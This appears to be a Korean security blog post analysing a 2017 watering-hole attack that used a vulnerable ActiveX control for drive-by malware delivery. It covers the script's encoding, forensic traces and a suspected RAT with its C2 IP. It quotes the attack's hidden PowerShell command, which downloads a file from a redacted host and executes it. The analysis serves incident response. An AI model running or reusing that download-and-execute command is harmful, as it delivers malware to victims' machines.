최근 이슈가 된 국내 취약한 ActiveX 프로그램 관련…

최근 이슈가 된 국내 취약한 ActiveX 프로그램을 이용한 워터링홀 공격 관련하여, 우연하게 인터넷에 공개되어 악성스크립트를 확보하게 되었습니다. 이 악성스크립트는 정보수립 이후, 특정 IP 대역(C Class)을 대상으로 타겟팅하여, DBD 방식으로 악성코드를 내보는 스크립트입니다.

그리고, DBD 형식으로 배포되는 악성 파일인 rss.gif(PE포맷) 파일도 입수하여 분석중에 있습니다. 공격자는 rss.gif 파일에 끝에 랜덤하게 문자를 추가하여, 매번 파일의 해쉬값이 변경되도록 하였습니다.

악성스크립트 특징

1. 악성 스크립트는 특별한 난독한 패킹 툴을 사용하지 않고,  HEXA 인코딩만 적용하였음. 아마도 스크립트 패킹 등이 되어 있으며, 의심될 수 있는 것을 감안하여 패킹을 하지 않은 것으로 판단 됨.
2. 악성 스크립트 엑세스한 후, 2분 후에 파워셀 코드를 이용하여, 악성 파일을 드랍받도록 되어 있음(DBD). 악성코드 드랍 방법은 취약한 ActiveX 모듈의 메서드 중에서 임의의 명령어 수행 가능한 메서드를 이용하여, 단말에서 시스템 명령어가 수행되도록 함.
3. DBD 형태로 다운로드된 파일은 C:\windows\temp\iexplore.exe 이름으로 저장하고, 실행 함. 사고조사 관점에서는 이 시점에 $MFT/ $Logfile/$UsnJrnl 파일 및 프리패치 파일 목록을 조사하여, 실제 다운로드 및 실행된 흔적 조사 필요.

아래 코드는 취약한 ActiveX 모듈에 내장된 메서드 중에 파라미터 값으로 전달 받은 인자 값을 실행하는 기능을 제공합니다. 아래 문자열은 실제 공격 코드에 명시도어 있는 인자 값의 배열이며, 2분 후에 파워쉘을 통해서 악성파일을 다운로드 받도록 도어 있음.

“cmd /c c:\windows\system32\at.exe “,” powershell -nop -nologo -wind hidden (New-Object System.Net.WebClient).DownloadFile(‘http://xxxx.xx.xx/xxxx/xx/rss.php’,’c:\windows\temp\iexplore.exe’);(New-Object -com Shell.Application).ShellExecute(‘c:\windows\temp\iexplore.exe’);

activex_enc

DBD방식으로 배포되는 악성파일:빌드날짜는 2017.05.19일

Screen Shot 2017-06-06 at 9.17.39 PM

C2 IP(180.70.94.66)

Screen Shot 2017-06-03 at 6.23.21 PM

Opendesktop api가 호출되어, RAT 관련 악성코드로 추정

Screen Shot 2017-06-03 at 6.43.04 PM

Advertisements

답글 남기기

아래 항목을 채우거나 오른쪽 아이콘 중 하나를 클릭하여 로그 인 하세요:

WordPress.com 로고

WordPress.com의 계정을 사용하여 댓글을 남깁니다. 로그아웃 /  변경 )

Google+ photo

Google+의 계정을 사용하여 댓글을 남깁니다. 로그아웃 /  변경 )

Twitter 사진

Twitter의 계정을 사용하여 댓글을 남깁니다. 로그아웃 /  변경 )

Facebook 사진

Facebook의 계정을 사용하여 댓글을 남깁니다. 로그아웃 /  변경 )

%s에 연결하는 중

%d 블로거가 이것을 좋아합니다: